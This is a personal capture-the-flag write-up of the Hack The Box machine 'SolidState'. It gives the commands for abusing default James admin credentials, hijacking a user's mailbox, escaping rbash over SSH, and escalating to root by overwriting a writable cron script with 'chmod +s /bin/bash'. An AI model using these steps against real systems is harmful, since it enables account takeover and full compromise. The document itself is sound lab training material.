# SolidState
># 10.10.10.51

nmap 
>PORT    STATE SERVICE VERSION
[22/tcp](portscan.md#22)  open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1
[25/tcp](portscan.md#25)  open  smtp    JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.8 [10.10.14.8]), 
[80/tcp](portscan.md#80)  open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Home - Solid State Security
[110/tcp](portscan.md#110) open  pop3    JAMES pop3d 2.3.2
[119/tcp](portscan.md#119) open  nntp    JAMES nntpd (posting ok)


Website on port 80
![[solidstate-001.png]]

This website is useless.

---
Haven't found nothing in a while and this looks suspicious, running again nmap but on ALL ports and this new one came out:
>[4555/tcp](portscan.md#4555) open  rsip?
| fingerprint-strings: 
|   GenericLines: 
|     JAMES Remote Administration Tool 2.3.2
|     Please enter your login and password
|     Login id:
|     Password:
|     Login failed for 
|_    Login id:

A remote administration tool?
This is enough for a more accurate research.

Standing to google:
>Apache James 2.3.2 is an email server containing a vulnerability that allows an attacker to execute arbitrary commands on the machine running the server.

Connecting with telnet to the port 4555
```bash
telnet 10.10.10.51 4555
```
We get asked for a username and password, before trying a bunch of tools let's give a shoot to the classic default credentials:
![[solidstate-002.png]]
>root:root 

and we're in.

The help menu state as follow:
![[solidstate-004.png]]

We can list users and modify their password, this will allow us to log in with their user into the mail server and read their correspondence.
The one with the jackpot is mindy(i've tried all of them)
```
setpassword mindy password
```
![[solidstate-005.png]]

If we have the credential we can login into the mail server connecting to the pop3 service on port 110
```bash
telnet 10.10.10.51 110
USER mindy
PASS password
LIST
RETR 1 #read first mail
RETR 2 #read second mail
```
![[solidstate-006.png]]

The content is the following:
```txt
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for <mindy@localhost>;
          Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access
Dear Mindy,
Here are your ssh credentials to access the system. Remember to reset your password after your first login. 
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path. 
username: mindy
pass: P@55W0rd1!2@

Respectfully,
James
```

We have some ssh credential
![[solidstate-007.png]]
And they're enough for the user flag.

---
As you can see we're using something called "rbash" a restricted shell.
![[solidstate-008.png]]
We can run env, cat and ls.
It's a shell-escape challenge.
After some attempts of command obfuscation without any result checking the content of /etc/passwd (cat-ing it as test for the char escaping test) reveal something useful:
>mindy:x:1001:1001:mindy:/home/mindy:/bin/rbash

The default shell for mindy is rbash, we can avoid being connected to our default tty with
```bash
ssh mindy@10.10.10.51 bash --noprofile
```
![[solidstate-014.png]]
It's not that beautiful but it works.

---

[Rabbit hole on port 631](solidstate-rabbithole)

---

Going back to linpeas and paying more attention
![[solidstate-020.png]]

We can spot a file in the /opt folder called "tmp.py"
Checking the permission of that file
![[solidstate-021.png]]
We can write and execute a file root owned.
```py
#!/usr/bin/env python
import os
import sys
try:
     os.system('rm -r /tmp/* ')
except:
     sys.exit()
```
It remove everything in the /tmp directory.
After couple of test we can address that every file created in the /tmp folder gets deleted after a couple of minute.
 
Overwriting the content of that file as follow:
```bash
echo "import os" > /opt/tmp.py
echo "os.system('chmod +s /bin/bash ')" >> /opt/tmp.py
```
We will be able to set the [SUID](vulnerability/suid.md) bit on the /bin/bash binary 
![[solidstate-022.png]]
And using 
```bash
bash -p
```
We get a root shell.
![[solidstate-023.png]]



#machine #pop3 #mailserver #shellescape 

